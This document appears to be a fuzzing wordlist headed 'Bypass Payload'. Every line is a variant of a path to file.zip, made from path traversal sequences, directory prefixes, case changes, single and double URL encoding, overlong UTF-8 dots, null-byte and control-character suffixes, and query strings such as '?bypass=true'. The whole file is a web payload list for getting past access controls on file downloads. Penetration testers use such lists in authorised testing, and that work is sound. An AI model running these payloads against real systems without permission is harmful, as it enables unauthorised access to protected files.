Bypass Payload
../../FILE.ZIP
../../FILE.ZIP#
../../FILE.ZIP%00
../../FILE.ZIP%09
../../FILE.ZIP%0A
../../FILE.ZIP%0D
../../FILE.ZIP%20
../../FILE.ZIP/
../../FILE.ZIP?
../../FILE.ZIP?access=1
../../FILE.ZIP?access=download
../../FILE.ZIP?bypass=true
../../FILE.ZIP?dl=1
../../FILE.ZIP?download=1
../../FILE.ZIP?file=true
../../FILE.ZIP?open=true
../../file%252Ezip
../../file%252Ezip#
../../file%252Ezip%00
../../file%252Ezip%09
../../file%252Ezip%0A
../../file%252Ezip%0D
../../file%252Ezip%20
../../file%252Ezip/
../../file%252Ezip?
../../file%252Ezip?access=1
../../file%252Ezip?access=download
../../file%252Ezip?bypass=true
../../file%252Ezip?dl=1
../../file%252Ezip?download=1
../../file%252Ezip?file=true
../../file%252Ezip?open=true
../../file%2Ezip
../../file%2Ezip#
../../file%2Ezip%00
../../file%2Ezip%09
../../file%2Ezip%0A
../../file%2Ezip%0D
../../file%2Ezip%20
../../file%2Ezip/
../../file%2Ezip?
../../file%2Ezip?access=1
../../file%2Ezip?access=download
../../file%2Ezip?bypass=true
../../file%2Ezip?dl=1
../../file%2Ezip?download=1
../../file%2Ezip?file=true
../../file%2Ezip?open=true
../../file%c0%aezip
../../file%c0%aezip#
../../file%c0%aezip%00
../../file%c0%aezip%09
../../file%c0%aezip%0A
../../file%c0%aezip%0D
../../file%c0%aezip%20
../../file%c0%aezip/
../../file%c0%aezip?
../../file%c0%aezip?access=1
../../file%c0%aezip?access=download
../../file%c0%aezip?bypass=true
../../file%c0%aezip?dl=1
../../file%c0%aezip?download=1
../../file%c0%aezip?file=true
../../file%c0%aezip?open=true
../../file.zip
../../file.zip#
../../file.zip%00
../../file.zip%09
../../file.zip%0A
../../file.zip%0D
../../file.zip%20
../../file.zip/
../../file.zip?
../../file.zip?access=1
../../file.zip?access=download
../../file.zip?bypass=true
../../file.zip?dl=1
../../file.zip?download=1
../../file.zip?file=true
../../file.zip?open=true
../FILE.ZIP
../FILE.ZIP#
../FILE.ZIP%00
../FILE.ZIP%09
../FILE.ZIP%0A
../FILE.ZIP%0D
../FILE.ZIP%20
../FILE.ZIP/
../FILE.ZIP?
../FILE.ZIP?access=1
../FILE.ZIP?access=download
../FILE.ZIP?bypass=true
../FILE.ZIP?dl=1
../FILE.ZIP?download=1
../FILE.ZIP?file=true
../FILE.ZIP?open=true
../file%252Ezip
../file%252Ezip#
../file%252Ezip%00
../file%252Ezip%09
../file%252Ezip%0A
../file%252Ezip%0D
../file%252Ezip%20
../file%252Ezip/
../file%252Ezip?
../file%252Ezip?access=1
../file%252Ezip?access=download
../file%252Ezip?bypass=true
../file%252Ezip?dl=1
../file%252Ezip?download=1
../file%252Ezip?file=true
../file%252Ezip?open=true
../file%2Ezip
../file%2Ezip#
../file%2Ezip%00
../file%2Ezip%09
../file%2Ezip%0A
../file%2Ezip%0D
../file%2Ezip%20
../file%2Ezip/
../file%2Ezip?
../file%2Ezip?access=1
../file%2Ezip?access=download
../file%2Ezip?bypass=true
../file%2Ezip?dl=1
../file%2Ezip?download=1
../file%2Ezip?file=true
../file%2Ezip?open=true
../file%c0%aezip
../file%c0%aezip#
../file%c0%aezip%00
../file%c0%aezip%09
../file%c0%aezip%0A
../file%c0%aezip%0D
../file%c0%aezip%20
../file%c0%aezip/
../file%c0%aezip?
../file%c0%aezip?access=1
../file%c0%aezip?access=download
../file%c0%aezip?bypass=true
../file%c0%aezip?dl=1
../file%c0%aezip?download=1
../file%c0%aezip?file=true
../file%c0%aezip?open=true
../file.zip
../file.zip#
../file.zip%00
../file.zip%09
../file.zip%0A
../file.zip%0D
../file.zip%20
../file.zip/
../file.zip?
../file.zip?access=1
../file.zip?access=download
../file.zip?bypass=true
../file.zip?dl=1
../file.zip?download=1
../file.zip?file=true
../file.zip?open=true
./FILE.ZIP
./FILE.ZIP#
./FILE.ZIP%00
./FILE.ZIP%09
./FILE.ZIP%0A
./FILE.ZIP%0D
./FILE.ZIP%20
./FILE.ZIP/
./FILE.ZIP?
./FILE.ZIP?access=1
./FILE.ZIP?access=download
./FILE.ZIP?bypass=true
./FILE.ZIP?dl=1
./FILE.ZIP?download=1
./FILE.ZIP?file=true
./FILE.ZIP?open=true
./file%252Ezip
./file%252Ezip#
./file%252Ezip%00
./file%252Ezip%09
./file%252Ezip%0A
./file%252Ezip%0D
./file%252Ezip%20
./file%252Ezip/
./file%252Ezip?
./file%252Ezip?access=1
./file%252Ezip?access=download
./file%252Ezip?bypass=true
./file%252Ezip?dl=1
./file%252Ezip?download=1
./file%252Ezip?file=true
./file%252Ezip?open=true
./file%2Ezip
./file%2Ezip#
./file%2Ezip%00
./file%2Ezip%09
./file%2Ezip%0A
./file%2Ezip%0D
./file%2Ezip%20
./file%2Ezip/
./file%2Ezip?
./file%2Ezip?access=1
./file%2Ezip?access=download
./file%2Ezip?bypass=true
./file%2Ezip?dl=1
./file%2Ezip?download=1
./file%2Ezip?file=true
./file%2Ezip?open=true
./file%c0%aezip
./file%c0%aezip#
./file%c0%aezip%00
./file%c0%aezip%09
./file%c0%aezip%0A
./file%c0%aezip%0D
./file%c0%aezip%20
./file%c0%aezip/
./file%c0%aezip?
./file%c0%aezip?access=1
./file%c0%aezip?access=download
./file%c0%aezip?bypass=true
./file%c0%aezip?dl=1
./file%c0%aezip?download=1
./file%c0%aezip?file=true
./file%c0%aezip?open=true
./file.zip
./file.zip#
./file.zip%00
./file.zip%09
./file.zip%0A
./file.zip%0D
./file.zip%20
./file.zip/
./file.zip?
./file.zip?access=1
./file.zip?access=download
./file.zip?bypass=true
./file.zip?dl=1
./file.zip?download=1
./file.zip?file=true
./file.zip?open=true
/downloads/FILE.ZIP
/downloads/FILE.ZIP#
/downloads/FILE.ZIP%00
/downloads/FILE.ZIP%09
/downloads/FILE.ZIP%0A
/downloads/FILE.ZIP%0D
/downloads/FILE.ZIP%20
/downloads/FILE.ZIP/
/downloads/FILE.ZIP?
/downloads/FILE.ZIP?access=1
/downloads/FILE.ZIP?access=download
/downloads/FILE.ZIP?bypass=true
/downloads/FILE.ZIP?dl=1
/downloads/FILE.ZIP?download=1
/downloads/FILE.ZIP?file=true
/downloads/FILE.ZIP?open=true
/downloads/file%252Ezip
/downloads/file%252Ezip#
/downloads/file%252Ezip%00
/downloads/file%252Ezip%09
/downloads/file%252Ezip%0A
/downloads/file%252Ezip%0D
/downloads/file%252Ezip%20
/downloads/file%252Ezip/
/downloads/file%252Ezip?
/downloads/file%252Ezip?access=1
/downloads/file%252Ezip?access=download
/downloads/file%252Ezip?bypass=true
/downloads/file%252Ezip?dl=1
/downloads/file%252Ezip?download=1
/downloads/file%252Ezip?file=true
/downloads/file%252Ezip?open=true
/downloads/file%2Ezip
/downloads/file%2Ezip#
/downloads/file%2Ezip%00
/downloads/file%2Ezip%09
/downloads/file%2Ezip%0A
/downloads/file%2Ezip%0D
/downloads/file%2Ezip%20
/downloads/file%2Ezip/
/downloads/file%2Ezip?
/downloads/file%2Ezip?access=1
/downloads/file%2Ezip?access=download
/downloads/file%2Ezip?bypass=true
/downloads/file%2Ezip?dl=1
/downloads/file%2Ezip?download=1
/downloads/file%2Ezip?file=true
/downloads/file%2Ezip?open=true
/downloads/file%c0%aezip
/downloads/file%c0%aezip#
/downloads/file%c0%aezip%00
/downloads/file%c0%aezip%09
/downloads/file%c0%aezip%0A
/downloads/file%c0%aezip%0D
/downloads/file%c0%aezip%20
/downloads/file%c0%aezip/
/downloads/file%c0%aezip?
/downloads/file%c0%aezip?access=1
/downloads/file%c0%aezip?access=download
/downloads/file%c0%aezip?bypass=true
/downloads/file%c0%aezip?dl=1
/downloads/file%c0%aezip?download=1
/downloads/file%c0%aezip?file=true
/downloads/file%c0%aezip?open=true
/downloads/file.zip
/downloads/file.zip#
/downloads/file.zip%00
/downloads/file.zip%09
/downloads/file.zip%0A
/downloads/file.zip%0D
/downloads/file.zip%20
/downloads/file.zip/
/downloads/file.zip?
/downloads/file.zip?access=1
/downloads/file.zip?access=download
/downloads/file.zip?bypass=true
/downloads/file.zip?dl=1
/downloads/file.zip?download=1
/downloads/file.zip?file=true
/downloads/file.zip?open=true
/files/file%2Ezip
/files/file%2Ezip%09
/files/file%2Ezip%20
/files/file%2Ezip/
/files/file.zip
/files/file.zip#
/files/file.zip%00
/files/file.zip%09
/files/file.zip%0A
/files/file.zip%0D
/files/file.zip%20
/files/file.zip/
/files/file.zip?
/files/file.zip?access=1
/files/file.zip?access=download
/files/file.zip?bypass=true
/files/file.zip?dl=1
/files/file.zip?download=1
/files/file.zip?file=true
/files/file.zip?open=true
/public/FILE.ZIP
/public/FILE.ZIP#
/public/FILE.ZIP%00
/public/FILE.ZIP%09
/public/FILE.ZIP%0A
/public/FILE.ZIP%0D
/public/FILE.ZIP%20
/public/FILE.ZIP/
/public/FILE.ZIP?
/public/FILE.ZIP?access=1
/public/FILE.ZIP?access=download
/public/FILE.ZIP?bypass=true
/public/FILE.ZIP?dl=1
/public/FILE.ZIP?download=1
/public/FILE.ZIP?file=true
/public/FILE.ZIP?open=true
/public/file%252Ezip
/public/file%252Ezip#
/public/file%252Ezip%00
/public/file%252Ezip%09
/public/file%252Ezip%0A
/public/file%252Ezip%0D
/public/file%252Ezip%20
/public/file%252Ezip/
/public/file%252Ezip?
/public/file%252Ezip?access=1
/public/file%252Ezip?access=download
/public/file%252Ezip?bypass=true
/public/file%252Ezip?dl=1
/public/file%252Ezip?download=1
/public/file%252Ezip?file=true
/public/file%252Ezip?open=true
/public/file%2Ezip
/public/file%2Ezip#
/public/file%2Ezip%00
/public/file%2Ezip%09
/public/file%2Ezip%0A
/public/file%2Ezip%0D
/public/file%2Ezip%20
/public/file%2Ezip/
/public/file%2Ezip?
/public/file%2Ezip?access=1
/public/file%2Ezip?access=download
/public/file%2Ezip?bypass=true
/public/file%2Ezip?dl=1
/public/file%2Ezip?download=1
/public/file%2Ezip?file=true
/public/file%2Ezip?open=true
/public/file%c0%aezip
/public/file%c0%aezip#
/public/file%c0%aezip%00
/public/file%c0%aezip%09
/public/file%c0%aezip%0A
/public/file%c0%aezip%0D
/public/file%c0%aezip%20
/public/file%c0%aezip/
/public/file%c0%aezip?
/public/file%c0%aezip?access=1
/public/file%c0%aezip?access=download
/public/file%c0%aezip?bypass=true
/public/file%c0%aezip?dl=1
/public/file%c0%aezip?download=1
/public/file%c0%aezip?file=true
/public/file%c0%aezip?open=true
/public/file.zip
/public/file.zip#
/public/file.zip%00
/public/file.zip%09
/public/file.zip%0A
/public/file.zip%0D
/public/file.zip%20
/public/file.zip/
/public/file.zip?
/public/file.zip?access=1
/public/file.zip?access=download
/public/file.zip?bypass=true
/public/file.zip?dl=1
/public/file.zip?download=1
/public/file.zip?file=true
/public/file.zip?open=true
FILE.ZIP
FILE.ZIP#
FILE.ZIP%00
FILE.ZIP%09
FILE.ZIP%0A
FILE.ZIP%0D
FILE.ZIP%20
FILE.ZIP/
FILE.ZIP?
FILE.ZIP?access=1
FILE.ZIP?access=download
FILE.ZIP?bypass=true
FILE.ZIP?dl=1
FILE.ZIP?download=1
FILE.ZIP?file=true
FILE.ZIP?open=true
file%252Ezip
file%252Ezip#
file%252Ezip%00
file%252Ezip%09
file%252Ezip%0A
file%252Ezip%0D
file%252Ezip%20
file%252Ezip/
file%252Ezip?
file%252Ezip?access=1
file%252Ezip?access=download
file%252Ezip?bypass=true
file%252Ezip?dl=1
file%252Ezip?download=1
file%252Ezip?file=true
file%252Ezip?open=true
file%2Ezip
file%2Ezip#
file%2Ezip%00
file%2Ezip%09
file%2Ezip%0A
file%2Ezip%0D
file%2Ezip%20
file%2Ezip/
file%2Ezip?
file%2Ezip?access=1
file%2Ezip?access=download
file%2Ezip?bypass=true
file%2Ezip?dl=1
file%2Ezip?download=1
file%2Ezip?file=true
file%2Ezip?open=true
file%c0%aezip
file%c0%aezip#
file%c0%aezip%00
file%c0%aezip%09
file%c0%aezip%0A
file%c0%aezip%0D
file%c0%aezip%20
file%c0%aezip/
file%c0%aezip?
file%c0%aezip?access=1
file%c0%aezip?access=download
file%c0%aezip?bypass=true
file%c0%aezip?dl=1
file%c0%aezip?download=1
file%c0%aezip?file=true
file%c0%aezip?open=true
file.zip
file.zip#
file.zip%00
file.zip%09
file.zip%0A
file.zip%0D
file.zip%20
file.zip/
file.zip?
file.zip?access=1
file.zip?access=download
file.zip?bypass=true
file.zip?dl=1
file.zip?download=1
file.zip?file=true
file.zip?open=true
